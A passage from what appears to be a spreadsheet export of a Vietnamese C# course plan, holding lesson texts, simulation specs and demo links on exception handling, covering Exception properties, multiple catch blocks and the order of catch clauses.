### InnerException
Khi một lỗi được bọc trong lỗi khác, `InnerException` giữ lỗi gốc. Nếu lỗi không bọc lỗi nào thì `InnerException` là `null`.
## Ví dụ: chia cho 0 qua hai phương thức
```csharp
using System;
public class Program
{
    static int Chia(int a, int b)
    {
        return a / b;
    }
    static void Main()
    {
        try
        {
            Chia(10, 0);
        }
        catch (DivideByZeroException ex)
        {
            Console.WriteLine(ex.GetType().Name);   // DivideByZeroException
            Console.WriteLine(ex.Message);          // Attempted to divide by zero.
            Console.WriteLine(ex.StackTrace);
            // at Program.Chia(Int32 a, Int32 b) in Program.cs:line 12
            // at Program.Main() in Program.cs:line 5
            Console.WriteLine(ex.InnerException == null);   // True
        }
    }
}
```
Số dòng trong `StackTrace` tùy vào tập tin của bạn. Điều quan trọng là thứ tự: `Chia` (nơi lỗi xảy ra) ở trên, `Main` (nơi gọi) ở dưới.
## Hoạt động: Xem bên trong biến ex
Mô phỏng dưới đây chạy đoạn mã `Chia(10, 0)` ở trên, với một ngăn xếp gọi hàm gồm `Main()` và `Chia(10, 0)`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Biến ex**. Đầu tiên `Main` gọi `Chia(10, 0)` với `a = 10`, `b = 0`. Tiếp theo, dòng `10 / 0` ném `DivideByZeroException`: một quả bóng đỏ xuất hiện trong ngăn xếp và đi ngược lên nơi gọi.
- Bấm tiếp: `catch (DivideByZeroException ex)` bắt được lỗi. Thẻ `ex` hiện loại `DivideByZeroException`, và cửa sổ Watch bắt đầu liệt kê các thuộc tính.
- Các dòng của cửa sổ Watch lần lượt xuất hiện: `ex.GetType().Name` là `"DivideByZeroException"`, `ex.Message` là `"Attempted to divide by zero."`, rồi `ex.StackTrace` gồm 2 dòng (đi từ `Chia` tới `Main`) được hiển thị trong một khung riêng.
- Bước cuối cho thấy `ex.InnerException` là `null` vì lỗi này không bọc lỗi nào khác.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/cau-truc-try-catch-co-ban/doi-tuong-exception-va-cac-thuoc-tinh/" title="Đối tượng Exception và thuộc tính" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: exception là một đối tượng có thuộc tính. `Message` dùng để báo người dùng, còn `StackTrace` dùng để lập trình viên tìm chỗ lỗi.
## Lưu ý khi ghi log
- Ghi `ex.ToString()` hoặc cả `Message` lẫn `StackTrace` vào tập tin log, không hiển thị `StackTrace` cho người dùng cuối vì nó tiết lộ cấu trúc bên trong của ứng dụng.
- Khi ứng dụng chạy thật, log là nguồn thông tin chính để đội phát triển tìm nguyên nhân.
## Tóm tắt
- Biến `ex` trong `catch` là một đối tượng chứa thông tin về lỗi.
- `ex.GetType().Name` cho biết loại lỗi, `Message` mô tả lỗi dễ đọc.
- `StackTrace` cho biết lỗi đi qua những phương thức nào, giúp định vị chỗ lỗi.
- `InnerException` giữ lỗi gốc, và là `null` nếu không có lỗi nào được bọc.
- Báo `Message` thân thiện cho người dùng, giữ `StackTrace` trong log.</t>
        </is>
      </c>
    </row>
    <row r="18" ht="409.6" customHeight="1" s="18">
      <c r="A18" s="10" t="n">
        <v>17</v>
      </c>
      <c r="B18" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C18" s="10" t="inlineStr">
        <is>
          <t>Bắt và xử lý nhiều loại Exception</t>
        </is>
      </c>
      <c r="D18" s="10" t="inlineStr">
        <is>
          <t>Bắt nhiều loại Exception trong một khối try</t>
        </is>
      </c>
      <c r="E18" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F18" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G18" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H18" s="10" t="inlineStr">
        <is>
          <t>Thấy C# so khớp exception với từng catch từ trên xuống và chỉ chạy catch đầu tiên phù hợp.</t>
        </is>
      </c>
      <c r="I18" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab theo dữ liệu nhập</t>
        </is>
      </c>
      <c r="J18" s="10" t="inlineStr">
        <is>
          <t>Các catch hiển thị như những cửa lọc xếp dọc. Exception (viên đỏ) rơi từ trên xuống: cửa không khớp hiện ✗ xám, cửa khớp hiện ✓ xanh. Tab không lỗi: viên đỏ không xuất hiện, các cửa đều xám.</t>
        </is>
      </c>
      <c r="K18" s="10" t="inlineStr">
        <is>
          <t>H05, H03</t>
        </is>
      </c>
      <c r="L18" s="10" t="inlineStr">
        <is>
          <t>"abc" | "0" | "99999999999" | "5"</t>
        </is>
      </c>
      <c r="M18" s="10" t="inlineStr">
        <is>
          <t>Code: int n = int.Parse(input); int r = 100 / n; ba catch: FormatException, DivideByZeroException, OverflowException.
"abc": Parse ném FormatException → khớp cửa 1.
"0": Parse được 0; 100 / 0 ném DivideByZeroException → cửa 1 ✗, cửa 2 ✓.
"99999999999": số vượt int → Parse ném OverflowException → cửa 1 ✗, cửa 2 ✗, cửa 3 ✓.
"5": không lỗi, r = 20, không catch nào chạy.
Bước cuối mỗi tab: chỉ đúng một catch (hoặc không catch nào) được chạy.</t>
        </is>
      </c>
      <c r="N18" s="10" t="inlineStr">
        <is>
          <t>abc, 0, 99999999999, 5</t>
        </is>
      </c>
      <c r="O18" s="10" t="inlineStr">
        <is>
          <t>Mỗi catch xử lý một loại lỗi. C# xét từ trên xuống và dừng ở catch khớp đầu tiên.</t>
        </is>
      </c>
      <c r="P18" s="10" t="inlineStr">
        <is>
          <t>int.Parse với số vượt phạm vi int ném OverflowException (không phải FormatException).</t>
        </is>
      </c>
      <c r="Q18" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/bat-va-xu-ly-nhieu-loai-exception/bat-nhieu-loai-exception-trong-mot-khoi-try/index.html</t>
        </is>
      </c>
      <c r="R18" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/bat-va-xu-ly-nhieu-loai-exception/bat-nhieu-loai-exception-trong-mot-khoi-try/</t>
        </is>
      </c>
      <c r="S18" s="10" t="n"/>
      <c r="T18" s="12" t="n"/>
      <c r="U18" s="12" t="n"/>
      <c r="V18" s="21" t="inlineStr">
        <is>
          <t>Tại sao cần bắt nhiều loại Exception?
Trong các bài học trước, bạn đã làm quen với cấu trúc try/catch cơ bản để xử lý một loại ngoại lệ (exception) cụ thể. Tuy nhiên, trong một ứng dụng thực tế, một khối mã lệnh duy nhất bên trong try có thể tiềm ẩn khả năng phát sinh nhiều loại lỗi khác nhau.
Ví dụ, khi bạn yêu cầu người dùng nhập một số, sau đó thực hiện phép chia với số đó:
Nếu người dùng nhập văn bản không phải là số (ví dụ: "abc"), sẽ xảy ra lỗi chuyển đổi kiểu dữ liệu.
Nếu người dùng nhập số 0 và bạn thực hiện phép chia cho số đó, sẽ xảy ra lỗi chia cho 0.
Một khối catch chỉ bắt một loại Exception cụ thể sẽ không đủ để xử lý tất cả các tình huống này. Nếu một loại lỗi không được khối catch của bạn dự kiến và xử lý, chương trình sẽ vẫn bị crash. Để xây dựng các ứng dụng mạnh mẽ và đáng tin cậy, chúng ta cần một cơ chế linh hoạt để bắt và xử lý nhiều loại Exception khác nhau từ cùng một khối try.
Cấu trúc try với nhiều khối catch
C# cho phép bạn định nghĩa nhiều khối catch đi kèm với một khối try duy nhất. Mỗi khối catch này được thiết kế để bắt một loại Exception cụ thể. Khi một Exception xảy ra trong khối try, Common Language Runtime (CLR) sẽ duyệt qua các khối catch theo thứ tự từ trên xuống dưới cho đến khi tìm thấy khối catch đầu tiên có thể xử lý loại Exception đó.
Cú pháp cơ bản như sau:
try
{
    // Đoạn mã có thể phát sinh nhiều loại Exception
}
catch (KieuExceptionThuNhat ex1)
{
    // Xử lý khi KieuExceptionThuNhat xảy ra
    Console.WriteLine($"Lỗi 1: {ex1.Message}");
}
catch (KieuExceptionThuHai ex2)
{
    // Xử lý khi KieuExceptionThuHai xảy ra
    Console.WriteLine($"Lỗi 2: {ex2.Message}");
}
// ... có thể có thêm các khối catch khác
finally
{
    // Khối finally (tùy chọn) luôn được thực thi, dù có Exception hay không
    Console.WriteLine("Hoạt động dọn dẹp đã hoàn tất.");
}
Mỗi khối catch sẽ "chuyên biệt" cho một loại Exception. Điều này cho phép bạn cung cấp logic xử lý lỗi tùy chỉnh và thông báo chính xác hơn cho từng loại sự cố.
Ví dụ thực tế: Xử lý FormatException và DivideByZeroException
Hãy cùng xem một ví dụ cụ thể về việc làm thế nào để xử lý FormatException (lỗi định dạng) và DivideByZeroException (lỗi chia cho 0) trong cùng một khối try.
Chúng ta sẽ xây dựng một chương trình nhỏ yêu cầu người dùng nhập hai số, sau đó thực hiện phép chia.
using System;
public class MultipleCatchExample
{
    public static void Main(string[] args)
    {
        Console.WriteLine("--- Chương trình Chia Số ---");
        try
        {
            Console.Write("Vui lòng nhập số thứ nhất: ");
            string input1 = Console.ReadLine();
            int soThuNhat = int.Parse(input1); // Có thể ném FormatException
            Console.Write("Vui lòng nhập số thứ hai: ");
            string input2 = Console.ReadLine();
            int soThuHai = int.Parse(input2);   // Có thể ném FormatException
            // Thực hiện phép chia
            int ketQua = soThuNhat / soThuHai; // Có thể ném DivideByZeroException
            Console.WriteLine($"Kết quả của {soThuNhat} chia {soThuHai} là: {ketQua}");
        }
        catch (FormatException ex)
        {
            // Khối này sẽ bắt các lỗi khi người dùng nhập không phải là số
            Console.WriteLine("\nLỗi Định Dạng Dữ Liệu!");
            Console.WriteLine($"Chi tiết lỗi: '{ex.Message}'");
            Console.WriteLine("Vui lòng đảm bảo bạn chỉ nhập các số nguyên hợp lệ.");
        }
        catch (DivideByZeroException ex)
        {
            // Khối này sẽ bắt lỗi khi cố gắng chia cho 0
            Console.WriteLine("\nLỗi Chia Cho 0!");
            Console.WriteLine($"Chi tiết lỗi: '{ex.Message}'");
            Console.WriteLine("Không thể chia một số cho 0. Vui lòng nhập một số khác 0.");
        }
        // Lưu ý: Các bạn sẽ tìm hiểu về Exception tổng quát (catch (Exception ex))
        // và thứ tự bắt Exception trong bài đọc tiếp theo.
        Console.WriteLine("\nChương trình kết thúc.");
    }
}
Hãy phân tích ví dụ trên:
Khối try: Chứa toàn bộ logic mà chúng ta muốn giám sát.
Dòng int soThuNhat = int.Parse(input1); và int soThuHai = int.Parse(input2); có thể ném ra FormatException nếu input1 hoặc input2 không phải là một chuỗi số hợp lệ (ví dụ: người dùng nhập "hello").
Dòng int ketQua = soThuNhat / soThuHai; có thể ném ra DivideByZeroException nếu soThuHai có giá trị là 0.
Khối catch (FormatException ex):
Nếu một FormatException xảy ra trong khối try, CLR sẽ chuyển quyền điều khiển đến khối catch này.
Chúng ta có thể in ra một thông báo lỗi thân thiện, giải thích rằng người dùng cần nhập số.
Khối catch (DivideByZeroException ex):
Nếu một DivideByZeroException xảy ra (và không có FormatException nào xảy ra trước đó), CLR sẽ chuyển quyền điều khiển đến khối catch này.
Chúng ta có thể in ra một thông báo lỗi cụ thể, giải thích rằng không thể chia cho 0.
Kịch bản chạy thử:
Kịch bản 1: Nhập dữ liệu hợp lệ
Vui lòng nhập số thứ nhất: 10
Vui lòng nhập số thứ hai: 2
Kết quả của 10 chia 2 là: 5
Chương trình kết thúc.
Giải thích: Không có Exception nào xảy ra, khối try thực thi hoàn chỉnh và các khối catch bị bỏ qua.
Kịch bản 2: Nhập chuỗi không phải số
Vui lòng nhập số thứ nhất: abc
Lỗi Định Dạng Dữ Liệu!
Chi tiết lỗi: 'Input string was not in a correct format.'
Vui lòng đảm bảo bạn chỉ nhập các số nguyên hợp lệ.
Chương trình kết thúc.
Giải thích: int.Parse("abc") ném ra FormatException. Khối catch (FormatException ex) được kích hoạt và xử lý lỗi.
Kịch bản 3: Nhập số 0 để chia
Vui lòng nhập số thứ nhất: 10
Vui lòng nhập số thứ hai: 0
Lỗi Chia Cho 0!
Chi tiết lỗi: 'Attempted to divide by zero.'
Không thể chia một số cho 0. Vui lòng nhập một số khác 0.
Chương trình kết thúc.
Giải thích: 10 / 0 ném ra DivideByZeroException. Khối catch (DivideByZeroException ex) được kích hoạt và xử lý lỗi.
Lợi ích của việc bắt Exception cụ thể
Việc sử dụng nhiều khối catch để bắt các loại Exception cụ thể mang lại nhiều lợi ích quan trọng:
Xử lý lỗi chính xác hơn: Bạn có thể viết logic xử lý riêng biệt cho từng loại lỗi, giúp chương trình phản ứng phù hợp với từng sự cố.
Thông báo người dùng rõ ràng: Cung cấp thông báo lỗi chi tiết và hữu ích hơn cho người dùng, thay vì một thông báo chung chung không giúp ích gì.
Ghi nhật ký (Logging) hiệu quả: Khi ghi lại lỗi vào hệ thống nhật ký, bạn có thể ghi lại thông tin cụ thể về loại Exception và ngữ cảnh của nó, giúp việc gỡ lỗi trở nên dễ dàng hơn.
Tăng cường khả năng phục hồi: Chương trình có thể phục hồi một cách có kiểm soát từ các lỗi khác nhau, thay vì dừng đột ngột.
Trong bài đọc tiếp theo, chúng ta sẽ tìm hiểu sâu hơn về thứ tự của các khối catch và cách sử dụng catch (Exception ex) để bắt tất cả các loại Exception không được xử lý bởi các khối catch cụ thể.</t>
        </is>
      </c>
      <c r="W18" s="22" t="inlineStr">
        <is>
          <t># Bắt nhiều loại Exception trong một khối try
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao một khối `try` có thể cần nhiều khối `catch`.
- Viết nhiều khối `catch`, mỗi khối bắt một loại exception cụ thể.
- Mô tả cách C# xét các `catch` từ trên xuống và chỉ chạy `catch` khớp đầu tiên.
- Nhận ra rằng chuỗi số quá lớn ném `OverflowException`, không phải `FormatException`.
- Quan sát từng exception đi qua các "cửa" `catch` bằng hoạt động mô phỏng.
## Vì sao cần nhiều khối catch?
Một đoạn mã trong `try` thường có thể gặp nhiều loại lỗi khác nhau. Ví dụ, chương trình đổi một chuỗi thành số rồi lấy 100 chia cho số đó:
```csharp
string input = "abc";
int n = int.Parse(input);   // có thể ném FormatException hoặc OverflowException
int r = 100 / n;            // có thể ném DivideByZeroException
```
- Nếu `input` là `"abc"`, việc đổi sang số thất bại.
- Nếu `input` là `"0"`, phép chia cho 0 thất bại.
- Nếu `input` là `"99999999999"`, số này quá lớn so với kiểu `int`.
Mỗi lỗi có nguyên nhân khác nhau, nên cách xử lý cũng nên khác nhau. Nếu chỉ có một `catch` cho một loại lỗi, các lỗi còn lại vẫn làm chương trình dừng đột ngột (crash).
## Cú pháp nhiều khối catch
Bạn có thể đặt nhiều `catch` sau một `try`. Mỗi `catch` khai báo một loại exception:
```csharp
using System;
public class Program
{
    public static void Main()
    {
        string input = "abc";
        try
        {
            int n = int.Parse(input);
            int r = 100 / n;
            Console.WriteLine(r);
        }
        catch (FormatException)
        {
            Console.WriteLine("Không phải số");
        }
        catch (DivideByZeroException)
        {
            Console.WriteLine("Chia cho 0");
        }
        catch (OverflowException)
        {
            Console.WriteLine("Quá lớn");
        }
    }
}
// Với input = "abc": Không phải số
```
Khi lỗi xảy ra, C# làm theo các bước sau:
1. Dòng gây lỗi ném ra một exception. Các dòng còn lại trong `try` bị bỏ qua.
2. C# xét các `catch` **từ trên xuống dưới**.
3. Gặp `catch` có kiểu **khớp** với exception thì chạy khối đó và **dừng xét**.
4. Các `catch` còn lại bị bỏ qua. Chương trình đi tiếp sau cả khối `try-catch`.
Nếu không có lỗi, không `catch` nào chạy.
## Kết quả với từng dữ liệu nhập
Với đoạn mã trên, đổi giá trị của `input` sẽ cho các kết quả sau:
| `input` | Chuyện xảy ra | Exception | In ra |
|---|---|---|---|
| `"abc"` | `int.Parse` không đổi được thành số | `FormatException` | Không phải số |
| `"0"` | `n = 0`, rồi `100 / n` | `DivideByZeroException` | Chia cho 0 |
| `"99999999999"` | Số vượt phạm vi của `int` | `OverflowException` | Quá lớn |
| `"5"` | `100 / 5 = 20` | không có | 20 |
Thông điệp (`Message`) của các exception này trong .NET hiện đại:
- `FormatException`: `The input string 'abc' was not in a correct format.`
- `DivideByZeroException`: `Attempted to divide by zero.`
- `OverflowException`: `Value was either too large or too small for an Int32.`
**Lưu ý:** chuỗi `"99999999999"` toàn chữ số nên đúng định dạng, nhưng giá trị lớn hơn `int.MaxValue` (2.147.483.647). Vì vậy nó ném `OverflowException`, không phải `FormatException`.
## Hoạt động: Exception đi qua các cửa catch
Mô phỏng dưới đây coi mỗi `catch` là một "cửa lọc". Exception đi qua từng cửa từ trên xuống. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **"abc"**. `int.Parse` không đổi được `"abc"` thành số nên ném `FormatException` (thẻ lỗi đỏ). Dòng `100 / n` không chạy. Cửa đầu `catch (FormatException)` khớp (cửa sáng xanh), in "Không phải số". Hai cửa còn lại không được xét.
- Mở tab **"0"**. `int.Parse` thành công, `n = 0`. Phép `100 / n` ném `DivideByZeroException`. Cửa thứ nhất không khớp (cửa mờ), exception rơi xuống cửa thứ hai `catch (DivideByZeroException)`, khớp và in "Chia cho 0".
- Mở tab **"99999999999"**. `int.Parse` ném `OverflowException` vì số vượt phạm vi `int`. Exception đi qua hai cửa đầu (không khớp) rồi dừng ở cửa thứ ba `catch (OverflowException)`, in "Quá lớn".
- Mở tab **"5"**. `n = 5`, `100 / 5 = 20`, in 20. Không có exception nên không cửa nào được xét.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/bat-va-xu-ly-nhieu-loai-exception/bat-nhieu-loai-exception-trong-mot-khoi-try/" title="Bắt nhiều loại Exception" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi `catch` xử lý một loại lỗi, và C# dừng ở `catch` khớp đầu tiên. Nhờ vậy mỗi tình huống lỗi nhận được cách xử lý riêng, còn khi không có lỗi thì không `catch` nào chạy.
## Lợi ích của việc bắt exception cụ thể
- **Thông báo đúng việc:** người dùng biết mình nhập sai định dạng hay chia cho 0.
- **Xử lý riêng cho từng lỗi:** ví dụ nhập lại với lỗi định dạng, dùng giá trị mặc định với lỗi chia cho 0.
- **Dễ gỡ lỗi:** nhìn tên `catch` là biết đoạn mã dự tính những lỗi nào.
## Tóm tắt
- Một khối `try` có thể đi kèm nhiều khối `catch`, mỗi khối bắt một loại exception.
- C# xét các `catch` từ trên xuống và chỉ chạy `catch` khớp đầu tiên.
- `"abc"` ném `FormatException`, `"0"` làm `100 / n` ném `DivideByZeroException`.
- Số vượt phạm vi `int` ném `OverflowException`, không phải `FormatException`.
- Không có exception thì không `catch` nào chạy.
- Thứ tự các `catch` rất quan trọng, bài sau sẽ nói kỹ hơn.</t>
        </is>
      </c>
    </row>
    <row r="19" ht="409.6" customHeight="1" s="18">
      <c r="A19" s="10" t="n">
        <v>18</v>
      </c>
      <c r="B19" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C19" s="10" t="inlineStr">
        <is>
          <t>Bắt và xử lý nhiều loại Exception</t>
        </is>
      </c>
      <c r="D19" s="10" t="inlineStr">
        <is>
          <t>Thứ tự bắt Exception và Exception chung</t>
        </is>
      </c>
      <c r="E19" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F19" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G19" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H19" s="10" t="inlineStr">
        <is>
          <t>Hiểu vì sao catch cụ thể phải đứng trước catch (Exception), dựa trên quan hệ cha – con giữa các lớp exception.</t>
        </is>
      </c>
      <c r="I19" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J19" s="10" t="inlineStr">
        <is>
          <t>Cây phân cấp: Exception → SystemException → FormatException, NullReferenceException; SystemException → ArithmeticException → DivideByZeroException, OverflowException. Khi so khớp, tô đường đi từ loại exception lên các lớp cha. Kết hợp bộ lọc catch xếp dọc.</t>
        </is>
      </c>
      <c r="K19" s="10" t="inlineStr">
        <is>
          <t>H06, H05, H03</t>
        </is>
      </c>
      <c r="L19" s="10" t="inlineStr">
        <is>
          <t>Thứ tự đúng | Exception chung bắt lỗi lạ | Thứ tự sai</t>
        </is>
      </c>
      <c r="M19" s="10" t="inlineStr">
        <is>
          <t>Thứ tự đúng: catch Format, catch DivideByZero, catch Exception. Ném DivideByZeroException → khớp catch 2.
Exception chung: ném NullReferenceException → không khớp 2 catch đầu; leo cây: NullReferenceException là một Exception → catch (Exception) bắt được.
Thứ tự sai: catch (Exception) đứng đầu → trình biên dịch báo lỗi CS0160 tại catch phía sau: "A previous catch clause already catches all exceptions of this or of a super type ('Exception')".
Bước cuối: catch (Exception) là lưới an toàn cuối cùng, đặt sau mọi catch cụ thể.</t>
        </is>
      </c>
      <c r="N19" s="10" t="inlineStr">
        <is>
          <t>Các loại exception cố định</t>
        </is>
      </c>
      <c r="O19" s="10" t="inlineStr">
        <is>
          <t>Catch cụ thể trước, chung sau. Một catch bắt được mọi exception là lớp con của kiểu nó khai báo.</t>
        </is>
      </c>
      <c r="P19" s="10" t="inlineStr">
        <is>
          <t>DivideByZeroException và OverflowException đều kế thừa ArithmeticException. Thứ tự sai là lỗi biên dịch, không phải lỗi lúc chạy.</t>
        </is>
      </c>
      <c r="Q19" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/bat-va-xu-ly-nhieu-loai-exception/thu-tu-bat-exception-va-exception-chung/index.html</t>
        </is>
      </c>
      <c r="R19" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/bat-va-xu-ly-nhieu-loai-exception/thu-tu-bat-exception-va-exception-chung/</t>
        </is>
      </c>
      <c r="S19" s="10" t="n"/>
      <c r="T19" s="12" t="n"/>
      <c r="U19" s="12" t="n"/>
      <c r="V19" s="21" t="inlineStr">
        <is>
          <t>Trong bài đọc trước, bạn đã tìm hiểu về sự cần thiết của việc bắt và xử lý nhiều loại ngoại lệ (exception) khác nhau trong cùng một khối try. Chúng ta đã thấy rằng một đoạn mã có thể phát sinh nhiều tình huống lỗi, đòi hỏi các khối catch riêng biệt. Tuy nhiên, khi có nhiều khối catch, thứ tự của chúng trở nên cực kỳ quan trọng. Bài đọc này sẽ đi sâu vào quy tắc về thứ tự bắt exception và giới thiệu về catch (Exception ex) – một công cụ mạnh mẽ nhưng cần được sử dụng cẩn trọng.
Quy tắc về thứ tự các khối catch: Cụ thể trước, Tổng quát sau
Khi một exception xảy ra trong khối try, hệ thống C# sẽ duyệt qua các khối catch theo thứ tự từ trên xuống dưới. Nó sẽ tìm khối catch đầu tiên có thể xử lý loại exception đó (hoặc một loại exception là lớp cơ sở của nó). Ngay khi tìm thấy một khối catch phù hợp, khối đó sẽ được thực thi và các khối catch còn lại sẽ bị bỏ qua.
Chính vì cơ chế này, chúng ta có một quy tắc vàng: Luôn đặt các khối catch xử lý các loại exception cụ thể hơn trước, và các khối catch xử lý các loại exception tổng quát hơn sau.
Tại sao lại như vậy? Hãy nhớ lại khái niệm đa hình (polymorphism) trong lập trình hướng đối tượng. Tất cả các exception trong .NET đều kế thừa từ lớp cơ sở System.Exception. Điều này có nghĩa là một FormatExceptioncũng là mộtException, một DivideByZeroExceptioncũng là mộtException, v.v.
Nếu bạn đặt catch (Exception ex) lên đầu, nó sẽ bắt tất cả các loại exception phát sinh, bao gồm cả các loại cụ thể như FormatException hay DivideByZeroException. Kết quả là, các khối catch cụ thể hơn nằm bên dưới sẽ không bao giờ được thực thi, bởi vì exception đã bị bắt bởi khối catch tổng quát đầu tiên. Trình biên dịch C# thậm chí sẽ báo lỗi nếu bạn cố gắng đặt một khối catch cụ thể sau một khối catch tổng quát mà nó không bao giờ có thể đạt tới.
Hãy xem ví dụ sau để hiểu rõ hơn:
using System;
public class ExceptionOrder
{
    public static void Main(string[] args)
    {
        Console.WriteLine("Nhập một số nguyên:");
        string input = Console.ReadLine();
        try
        {
            int number = int.Parse(input);
            int result = 100 / number;
            Console.WriteLine($"Kết quả: {result}");
        }
        // KHÔNG ĐÚNG: Khối catch tổng quát đặt trước khối cụ thể.
        // Điều này sẽ gây lỗi biên dịch nếu FormatException là lớp con của Exception.
        // C# compiler sẽ báo lỗi "A previous catch clause already catches all exceptions of this or a super type ('System.Exception')"
        /*
        catch (Exception ex)
        {
            Console.WriteLine($"Lỗi chung: {ex.Message}");
        }
        catch (FormatException ex)
        {
            Console.WriteLine($"Lỗi định dạng: '{input}' không phải là số hợp lệ.");
        }
        */
        // ĐÚNG: Khối catch cụ thể đặt trước, khối tổng quát đặt sau
        catch (FormatException ex)
        {
            Console.WriteLine($"Lỗi định dạng: '{input}' không phải là số hợp lệ. Chi tiết: {ex.Message}");
        }
        catch (DivideByZeroException ex)
        {
            Console.WriteLine("Lỗi chia cho 0: Không thể chia một số cho 0.");
        }
        catch (Exception ex) // Đây là khối catch tổng quát cuối cùng
        {
            Console.WriteLine($"Một lỗi không xác định đã xảy ra: {ex.Message}");
            // Bạn có thể ghi log chi tiết hơn ở đây với ex.StackTrace
        }
        finally
        {
            Console.WriteLine("Khối finally luôn được thực thi.");
        }
    }
}
Trong ví dụ trên, nếu người dùng nhập "abc", một FormatException sẽ xảy ra. Khối catch (FormatException ex) sẽ bắt và xử lý nó. Nếu người dùng nhập "0", một DivideByZeroException sẽ xảy ra, và khối catch (DivideByZeroException ex) sẽ xử lý. Nếu một loại exception khác (ví dụ: OverflowException nếu số quá lớn) xảy ra mà không có khối catch cụ thể nào cho nó, thì khối catch (Exception ex) cuối cùng sẽ bắt nó.
Sử dụng catch (Exception ex) để bắt tất cả các loại Exception
System.Exception là lớp cơ sở của tất cả các exception trong .NET. Do đó, catch (Exception ex) là một khối catch "tổng quát" hoặc "bắt tất cả" (catch-all). Nó sẽ bắt bất kỳ exception nào chưa được xử lý bởi các khối catch cụ thể hơn đứng trước nó.
Việc sử dụng catch (Exception ex) ở cuối danh sách các khối catch đảm bảo rằng chương trình của bạn sẽ không bị crash do một exception không lường trước được. Nó hoạt động như một "lưới an toàn" cuối cùng, bắt giữ mọi thứ rơi qua các mắt lưới cụ thể hơn.
Khi bạn bắt một Exception bằng catch (Exception ex), bạn có thể truy cập vào đối tượng ex để lấy thông tin chi tiết về lỗi, bao gồm:
ex.Message: Một chuỗi mô tả ngắn gọn về lỗi.
ex.StackTrace: Một chuỗi chi tiết về nơi lỗi xảy ra trong mã của bạn, rất hữu ích cho việc gỡ lỗi.
ex.InnerException: Nếu exception hiện tại được ném ra để gói gọn một exception khác, InnerException sẽ chứa exception gốc đó.
using System;
using System.IO; // Cần thiết cho DirectoryNotFoundException
public class GeneralCatchExample
{
    public static void Main(string[] args)
    {
        Console.WriteLine("Thử đọc từ một thư mục không tồn tại.");
        try
        {
            string path = @"C:\NonExistentDirectory\file.txt"; // Giả định thư mục này không tồn tại
            string content = File.ReadAllText(path);
            Console.WriteLine($"Nội dung file: {content}");
        }
        catch (FileNotFoundException ex)
        {
            Console.WriteLine($"Lỗi: Không tìm thấy file tại đường dẫn '{ex.FileName}'.");
        }
        catch (DirectoryNotFoundException ex)
        {
            Console.WriteLine($"Lỗi: Thư mục tại đường dẫn '{ex.Message}' không tồn tại.");
        }
        catch (UnauthorizedAccessException ex)
        {
            Console.WriteLine($"Lỗi truy cập: Bạn không có quyền đọc file. Chi tiết: {ex.Message}");
        }
        catch (Exception ex) // Khối catch tổng quát cuối cùng
        {
            Console.WriteLine("------------------------------------------");
            Console.WriteLine($"Một lỗi không mong muốn đã xảy ra!");
            Console.WriteLine($"Loại lỗi: {ex.GetType().Name}");
            Console.WriteLine($"Thông điệp: {ex.Message}");
            Console.WriteLine($"Stack Trace: {ex.StackTrace}");
            Console.WriteLine("------------------------------------------");
        }
        finally
        {
            Console.WriteLine("Kết thúc quá trình xử lý file.");
        }
    }
}
Trong ví dụ trên, nếu thư mục C:\NonExistentDirectory không tồn tại, một DirectoryNotFoundException sẽ được bắt. Nếu file file.txt không tồn tại nhưng thư mục có, FileNotFoundException sẽ được bắt. Nếu có bất kỳ lỗi nào khác trong quá trình đọc file (ví dụ: lỗi mạng, lỗi bộ nhớ, v.v.) mà không được các khối catch cụ thể trước đó xử lý, thì khối catch (Exception ex) sẽ bắt nó và in ra thông tin chi tiết.
Khi nào nên và không nên sử dụng catch (Exception ex)
catch (Exception ex) là một công cụ mạnh mẽ nhưng cần được sử dụng một cách có trách nhiệm.
Khi nào nên sử dụng catch (Exception ex):
Tại tầng cao nhất của ứng dụng (Top-level exception handling): Đây là nơi phổ biến và phù hợp nhất. Ví dụ, trong phương thức Main() của ứng dụng console, trong các global error handler của ứng dụng web (ASP.NET), hoặc trong các sự kiện Application.ThreadException của ứng dụng desktop. Mục đích là để ghi lại tất cả các lỗi không được xử lý, hiển thị một thông báo thân thiện cho người dùng (thay vì crash), và giữ cho ứng dụng hoạt động ổn định nhất có thể.
